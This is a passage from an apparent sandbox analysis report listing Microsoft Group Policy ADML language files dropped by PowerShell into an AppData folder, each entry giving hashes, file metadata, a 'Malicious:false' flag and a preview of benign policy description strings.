                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NC_AddRemoveComponents">Prohibit adding and removing components for a LAN or remote access connection</string>.. <string id="NC_AddRemoveComponents_Help">Determines whether administrators can add and remove network components for a LAN or remote access connection. This setting has no effect on nonadministrators.....If you enable this setting (and enable the "Enable Network Connections settings for Administrators" setting), the Install and Uninstall buttons for components of connections are disabled, and admini

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\NetworkIsolation.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:exported SGML document, ASCII text, with very long lines (461), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):6746
                                                                                          Entropy (8bit):4.9079819692940125
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:V+D5pmzqJhUf3fJyoZ+EsiZoTCdhY5+J6M6xpBGbvH4J5w4V:qdU/hyoXZoSrJ6nxpkbvHKN
                                                                                          MD5:39E7220D62B6A3DBB2C126FBB57233BA
                                                                                          SHA1:FA2CA706CB425FF910215D0E0D84DC05FEC673B6
                                                                                          SHA-256:D7FDCFBCAD3F6A8CAE618320A16E408B4EF7A2830EBE54AC141F8CD37C4B26D2
                                                                                          SHA-512:843380F52E434137DE92DF229B2C5103223EB4A22C6A52FC679B63A943938BD38B5AA5167F4DDB6620E921CEA1315B1EA84E1847AD83C780419FC1470E93E9BE
                                                                                          Malicious:false
                                                                                          Preview: (c) 2011 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Network Isolation </displayName>.. <description>Configures Network Isolation Options for apps </description>.. <resources>.. <stringTable>.. .<string id="WF_Isolation">Network Isolation</string>........ Define server addresses that proxy to the Internet -->......<string id="WF_NetIsolation_Domain_Proxies">Internet proxy servers for apps</string> ...<string id="WF_NetIsolation_Domain_Proxies_Help"> This setting does not apply to desktop apps......A semicolon-separated list of Internet proxy server IP addresses. These addresses are categorized as Internet by Windows Network Isolation and are accessible to apps that have the Internet Client or Internet Client/Server capabilities....

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\NetworkProjection.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2267
                                                                                          Entropy (8bit):4.838388154516794
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKQqmmBpOVxwxpBewWk7EQg+61kg+6xrjMWK/WV:LeD5pmEqmmp8xwLBzWkiz/zZjMWK/WV
                                                                                          MD5:1AEA64EE82CCCF20BE4E7178E0D9C569
                                                                                          SHA1:674AC6F5BD545EB75E05FED6CDD384C4440C2B29
                                                                                          SHA-256:615E09EEC96E2E99550CA7014AD5E7249C031E1E19B2241032C1BE983622729D
                                                                                          SHA-512:0FDE894C202D495A8A674E637B6E5B1BE25333C1D4BFECA1CA3503A19E43ECB847131FF32B81145822C87513C308C07B9CBB8A519A62999FA992CB28C3348210
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableNetworkProjector">Turn off Connect to a Network Projector</string>.. <string id="DisableNetworkProjectorExplain">This policy setting disables the Connect to a Network Projector wizard so that users cannot connect to a network projector. ....If you enable this policy setting, users cannot use the Connect to a Network Projector Wizard to connect to a projector. ....If you disable or do not configure this policy setting, users can run the Connect to a Network Projector Wizard to connect to a projector.</st

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\OfflineFiles.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (634), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):50909
                                                                                          Entropy (8bit):4.7108422069629725
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:c5kq1yeql7iURcwKILdZoJ7TCFRFzMOXIo:ZekZMOD
                                                                                          MD5:845935D73456E658B4DD9CB27224CBF7
                                                                                          SHA1:7336E494495EB05622F3791BC19E46499B3B60DE
                                                                                          SHA-256:169924EB41BD644647F5F4710438C757F1C3BEF0196D4D09CBF9B52D05D17A47
                                                                                          SHA-512:9F6BDF080314A23D1A82321CB3C8171130695E82205F32E895A7C1EEDAE59571E2C22E09171FA9377BC429A0E8118E44E151754ED2FF1A63B112494F54A9FF02
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Cat_OfflineFiles">Offline Files</string>.. <string id="Lbl_Fail">Never go offline</string>.. <string id="Lbl_FullSync">Full</string>.. <string id="Lbl_QuickSync">Quick</string>.. <string id="Lbl_WorkOffline">Work offline</string>.. <string id="Pol_AlwaysPinSubFolders">Subfolders always available offline</string>.. <string id="Pol_AlwaysPinSubFolders_Help">Makes subfolders available offline whenever their parent folder is made available offline.....This setting automatically extends the

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\P2P-pnrp.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (447), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):15965
                                                                                          Entropy (8bit):4.663039279812552
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:EVvPk2QsF4WSKheDnylZ+QsF4W+KheDnyxko4QsF4WnKheDnyGS8OzsO4WdmI:OLvhwTjhwK4khwQ8wr
                                                                                          MD5:4CE12CD17365AE6E6C922AE0C3D70110
                                                                                          SHA1:328E59731F170FD42BA614E5FD6AC09AAD91C8D5
                                                                                          SHA-256:D262B118B555E83840A9AC077963B0E50F589C09950F77EB5865D25776D1A78B
                                                                                          SHA-512:41B5A3AF2D00993E50B4DA53132DFF75F07B549405C88589FB96AA85E074C418CA35931FA1B674EF7129B3495FABE404EF4A74F4C20A48BDE6F3E7A7408583A6
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="P2P_Disabled">Turn off Microsoft Peer-to-Peer Networking Services</string>.. <string id="P2P_Disabled_Explain">This setting turns off Microsoft Peer-to-Peer Networking Services in its entirety, and will cause all dependent applications to stop working.....Peer-to-Peer protocols allow for applications in the areas of RTC, collaboration, content distribution and distributed processing.....If you enable this setting, peer-to-peer protocols will be turned off.....If you disable this setting or do not configure it,

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\ParentalControls.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1084
                                                                                          Entropy (8bit):5.01040774159096
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yDTRc42cN28Ml28Sv7T8MZFV:cgeD5x8gm8fKitDvNQlGVFV
                                                                                          MD5:2DD43AEA1D0F6713F020401FC72878BC
                                                                                          SHA1:4A8B428938DB72FC55F5EA72F95E9323BE1B4192
                                                                                          SHA-256:FC70BC44ADAEC32E39A503CEEC2F52B98C697D61BE6C120A96480445A968FE5A
                                                                                          SHA-512:CB4FC3B7FC46F1CBFEE1EDA2B6D51ECE2E8DBE983BB0D083109D999AC020634721FD3B42D917FEB9146A12F86D79389FAA6B95CA0832F58CC063B22D0C4B882B
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ParentalControls">Family Safety</string>.. <string id="ParentalControls_EnableOnDomain_help">This policy setting allows you to configure the Family Safety feature.....If you enable this policy setting, the Family Safety control panel is visible on a domain joined computer.....If you disable or do not configure this policy setting, the Family Safety control panel is not visible on a domain joined computer.</string>.. <string id="ParentalControls_EnableOnDomain">Make Family Safety control panel visible on a

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\PeerToPeerCaching.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (754), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):24638
                                                                                          Entropy (8bit):4.564624284444478
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:N1iKAegTK4PjZqKNomwtzxkBK8R02vXkh3RIaImzg6h3hquhT:N1itegT5PjsQHwtzxkBJR9yqmzh3N
                                                                                          MD5:B5D667D298E0EDCC6D2FB6F0C01B7223
                                                                                          SHA1:931DE60F0DBE31DC890905C6D7ACC05112F810A8
                                                                                          SHA-256:673CB9F3C9B5B753C41C6B44519A04C32A10ABD90533CEC88E4AD20A0E564D55
                                                                                          SHA-512:44C5535A92A8DE5364FCC39ED26171BBA4C25DDE495BFA9A9695A7F2E7F579AE08D972CAFF848ED9D5A6339307EA3CD2033838FF8AE006340D2CCB8A9F90ADB9
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>BranchCache</displayName>.. <description>BranchCache enables clients to securely retrieve content from within the branch office instead of having to retrieve it from the server hosting the content. Depending on the deployment mode, the content can be retrieved from other clients in the branch office or from a hosted cache server in the branch. A client can only retrieve content from within the branch if it is authorized by the server to do so. The use of BranchCache reduces costs on the wide area network (WAN) link that connects your branch offices to the data center or headquarters and increases download speeds for content that has already been downl

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\PenTraining.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1208
                                                                                          Entropy (8bit):5.027249517124002
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yx9WmOQzWmYKAQKvqmiHAQKvMFV:cgeD5x8gm8fKAQmOVmYHimTHkFV
                                                                                          MD5:7B4EC129E00834B2E499BEBCE8E75083
                                                                                          SHA1:D4BEA36D9A628D70055431E5A6967BAF87294A02
                                                                                          SHA-256:A00BB104395F6DC86AF2921893AF3BC129D7A2A2DDFA5CCA22FF6D055AF11E31
                                                                                          SHA-512:5A5E2389AB7A3C432FEEB8D68F1C144A1525934FC1FA8442E8C12CC11652FEDF101E73AD8D10197FDC0F6AF0DA2D887BEFE2BAD792BEF4E943DD9C71EBAEB2F6
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PenTraining">Tablet PC Pen Training</string>.. <string id="PenTrainingOff">Turn off Tablet PC Pen Training</string>.. <string id="PenTrainingOff_Help_LOCALMACHINE">Turns off Tablet PC Pen Training.....If you enable this policy setting, users cannot open Tablet PC Pen Training.....If you disable or do not configure this policy setting, users can open Tablet PC Pen Training.</string>.. <string id="PenTrainingOff_Help_USER">Turns off Tablet PC Pen Training.....If you enable this policy setting, users ca

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\PerformanceDiagnostics.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (577), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8181
                                                                                          Entropy (8bit):4.68291957028103
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:E65cdjVSpt6DejVSpOZq1jVSpWLqXjVSpsHz2TgS:bk4md
                                                                                          MD5:1242B4E18BC034195D7064E4CDEB8B92
                                                                                          SHA1:4BF81B86AC91ED3B51C97569728CD29858459D68
                                                                                          SHA-256:29F060D6A4CA93A94F33D46150AF949B5F2EB63214AF05C5700E552555F81C54
                                                                                          SHA-512:0A17703E8858409CB9AEBE827143EA77516576F473AC18873B3848F4A4D000F739E757655945CAB3DBE8E05B06496E07C2C8C7811CE5D7407153D9B167B8015E
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="BootScenarioCategory">Windows Boot Performance Diagnostics</string>.. <string id="BootScenarioExecutionPolicyExplain">Determines the execution level for Windows Boot Performance Diagnostics.....If you enable this policy setting, you must select an execution level from the dropdown menu. If you select problem detection and troubleshooting only, the Diagnostic Policy Service (DPS) will detect Windows Boot Performance problems and attempt to determine their root causes. These root causes will be logged to the eve

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\PerformancePerftrack.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1205
                                                                                          Entropy (8bit):4.988086677223878
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yuh9J6k7LXp4qVacJPYidFV:cgeD5x8gm8fKVJ6kSuacFYidFV
                                                                                          MD5:EF84A579BC8272236E53AB9F5BEE92CB
                                                                                          SHA1:670EA5FF6A1559F695E15D3A2D17B2A100BA79B7
                                                                                          SHA-256:82C7F47D059ED97EF6AC7068E43E6933E84ACE56543FD8C945065A51C0644A63
                                                                                          SHA-512:92D8CC050A24AC9F2D059486A9EA5A8184FCC6798261F789E36F1A4694F379EC9EFA8CA69AF8D53502187B7D908850EB2233038BD22901D116195F32E0E8A937
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PerfTrackCategory">Windows Performance PerfTrack</string>.. <string id="PerfTrackScenarioExecutionPolicyExplain">This policy setting specifies whether to enable or disable tracking of responsiveness events.....If you enable this policy setting, responsiveness events are processed and aggregated. The aggregated data will be transmitted to Microsoft through SQM.....if you disable this policy setting, responsiveness events are not processed.....If you do not configure this policy setting, the DPS will enable Wind

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Power.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (389), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):29740
                                                                                          Entropy (8bit):4.822333468541642
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:EkJF7YAK1c67c5h9xRoKYy5V8iisCaeZou2Ap6:EkJF7YA0a9xR5V8iPCgu2Ap6
                                                                                          MD5:C0E2A98755B3DA961DBBCFA1A621154B
                                                                                          SHA1:878508DB646C47D8A36C90305D919C52CD8DC11C
                                                                                          SHA-256:0F8B66F7B315426ABEC4B71912D2FF5F1F4A573AC391CD8E0A10738AF808F8A6
                                                                                          SHA-512:AD72CA9823E3581557BE15F198F6BB697CEF9CC372881FED501DB236D6B35834A220603F4AB36FBEE65D36DF3473862F0AD93F9443EF82204F28130F635910E8
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ACCriticalSleepTransitionsDisable">Turn on the ability for applications to prevent sleep transitions (plugged in)</string>.. <string id="ACHibernateTimeOut">Specify the system hibernate timeout (plugged in)</string>.. <string id="ACPowerButtonAction">Select the Power button action (plugged in)</string>.. <string id="ACPromptForPasswordOnResume">Require a password when a computer wakes (plugged in)</string>.. <string id="ACSleepButtonAction">Select the Sleep button action (plugged in)</string>..

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\PowerShellExecutionPolicy.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8601
                                                                                          Entropy (8bit):4.7004620993687665
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:wB3f/vzRzuppcRzhl5tWSLh2xwqmHfc9Ka7yOUpJD4mUQfStlm8hOE9m7pqHXSp3:ozRzu0P+uIxrmpn8mgtlm8B9mgc3
                                                                                          MD5:6E1645BEEB36B67E2486DF156AD73713
                                                                                          SHA1:96BF04C94854CBA227B3E3518A5BF6EEEEFFCA64
                                                                                          SHA-256:1963DE8A3D77000A3DCF16B751132920F2F8ED0274905285C914469D1597F11D
                                                                                          SHA-512:5A6D2DAEE84146D94A7D93640C92B14792C759D1E778C25BA3CA3B892628B87848EC414EC6DB709F6912B3E38397C608A343D719AF8B26169022FADBCF35DB79
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<policyDefinitionResources xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" revision="1.0" schemaVersion="1.0" xmlns="http://www.microsoft.com/GroupPolicy/PolicyDefinitions">.. <displayName>Windows PowerShell</displayName>.. <description>This file contains the configuration options for Windows PowerShell</description>.. <resources>.. <stringTable>.. <string id="AllScripts">Allow all scripts</string>.. <string id="AllScriptsSigned">Allow only signed scripts</string>.. <string id="EnableScripts">Turn on Script Execution</string>.. <string id="EnableScripts_Explain">This policy setting lets you configure the script execution policy, controlling which scripts are allowed to run.....If you enable this policy setting, the scripts selected in the drop-down list are allowed to run.....The "Allow only signed scripts" policy setting allows scripts to execute only if they are signed

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\PreviousVersions.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5301
                                                                                          Entropy (8bit):4.592135641503131
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmieohnx5hxncDmeoqCcxjBgAeocs7x7BNcGDQaFV:EBtx5h9zqCccQcs75BhDQan
                                                                                          MD5:4DAE700A902336A7ACD9315F2DCB6F00
                                                                                          SHA1:B472C8447E223252B2B43403D60468B62C3FFE2C
                                                                                          SHA-256:DC5A3DE3D24654B83D269B2A74148B777261995A56ABAD7943616BBA648A28AE
                                                                                          SHA-512:3C572957861E0FD9D62F51C8ED0DB407C7C20C1DBCD99B2F06F60DE19D31158367D03C8729E8EC0B41F983D7744F9FEADE91C4AE68434EFEBDF57F9BBC201D9E
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableBackupRestore">Prevent restoring previous versions from backups</string>.. <string id="DisableBackupRestore_Help">This policy setting lets you suppress the Restore button in the previous versions property page when the user has selected a previous version of a local file, in which the previous version is stored on a backup.....If you enable this policy setting, the Restore button is disabled when the user selects a previous version corresponding to a backup.....If you disable this policy setting, the Re

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Printing.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (568), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):33066
                                                                                          Entropy (8bit):4.630945231898182
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:YRG9T17KYkXyUrqDiynH2yi4oO+gwlquRfpxHkyT/yT/eaXl+H1CUnJi:tvmrrnlpxHkyedu1CUnw
                                                                                          MD5:587143E4C31AF88A0591C34F205DB7FB
                                                                                          SHA1:F6B86A1E88E2822BA2A595E6BD047BD04CCD5C0B
                                                                                          SHA-256:90D12A7BC2ECAE124C62A43069FCD48E3AAA6F214325372EA82E5727F290D184
                                                                                          SHA-512:ED01D954728347AA2A0DED6D0F351BDDD5C9CA0254802BCEED01104D5C5909342A15A6D628B4249782151E748514679822A169A3CC846722E1BA81A24D9EAAA3
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8" standalone="yes"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowWebPrinting">Activate Internet printing</string>.. <string id="AllowWebPrinting_Help">Internet printing lets you display printers on Web pages so that printers can be viewed, managed, and used across the Internet or an intranet..... If you enable this policy setting, Internet printing is activated on this server..... If you disable this policy setting or do not configure it, Internet printing is not activated..... Internet printing is an extension of Internet In

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Printing2.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (640), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):14598
                                                                                          Entropy (8bit):4.638367767119586
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:vPo4LQX7miuddCSgP71CTd5xZSq5ynxWmBIY+DOxH++JGQfFD:ox7Idu7Ih5xwqcJJrxPAM
                                                                                          MD5:5BA865D69814055E09D5698701921315
                                                                                          SHA1:E0F4F6C1D949A6E2B1A30D4397CED3C175A3F003
                                                                                          SHA-256:28D160709A578AE08008CE9F84EFA853F0CD30C05AC418ED0085133B7F5BE4F8
                                                                                          SHA-512:7A09CB06DAE4236124B0CDE8B8C4887C95CEAE97C1EEB8D632AFE142B4ED7BBA4DB52AE3BFF03253C9CE7C5242FD6E8894B74A7AB294BECA5B39429FCF09591F
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8" standalone="yes"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0">.. <displayName>Printing Group Policies</displayName>.. <description>Printing Group Policies valid on all Windows flavors except ARM</description>.. <resources>.. <stringTable>.. <string id="RegisterSpoolerRemoteRpcEndPoint">Allow Print Spooler to accept client connections</string>.. <string id="RegisterSpoolerRemoteRpcEndPoint_Help">This policy controls whether the print spooler will accept client connections.....When the policy is unconfigured or enabled, the spooler will always accept client connections.....When the policy is disabled, the spooler will not accept client connections nor allow users to share printers. All printers current

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Programs.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (424), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):7022
                                                                                          Entropy (8bit):4.658208655049282
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmxKh8Wc3Ww1nZy8hmiZWV9k4W0DWivt2fpre9hWJT+K3AqcOrzqhScDMFsO:EU3RnY82DVYfUrWd+kxXc0sVcfu9q
                                                                                          MD5:14D4B2677604A342B26891EFC3597078
                                                                                          SHA1:A51EBAF7D5FCFF778B9AEDCE6F37C5C9D6B2B0EC
                                                                                          SHA-256:5EE2DF374170A87F773008D43AEBEBEF3E1C451F0E9A530B6F2CD5C1601E0012
                                                                                          SHA-512:DB06D2D412763EC3ACA0D03D4694E6D86C4149B57BD31EA91E8C0E0C3ED8C56B15FDBB2B3FB441D5DC3C5BD262FDE2543A27477FF32C2509473B87B5B10DEDEF
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Programs">Programs</string>.. <string id="NoProgramsCPL">Hide the Programs Control Panel</string>.. <string id="NoProgramsCPL_Help">This setting prevents users from using the Programs Control Panel in Category View and Programs and Features in Classic View... ..The Programs Control Panel allows users to uninstall, change, and repair programs, enable and disable Windows Features, set program defaults, view installed updates, and purchase software from Windows Marketplace. Programs published or assigned to

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\PswdSync.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (366), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4835
                                                                                          Entropy (8bit):4.774670262203608
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmMM44GDFsil1oXY7XlMXC3K8GDFeMbiZC0XEV:EB4eFUXUXuy33eFPAX0
                                                                                          MD5:81A4179A1F50B390A55CEC61B95F6752
                                                                                          SHA1:1D21A6C288E6EB744C52CCAA2A81298CAB467B12
                                                                                          SHA-256:5A277C91D697FECAEBECFD1AA4A38F6027C5800BFB4B5EBEBBA90251C788BEAB
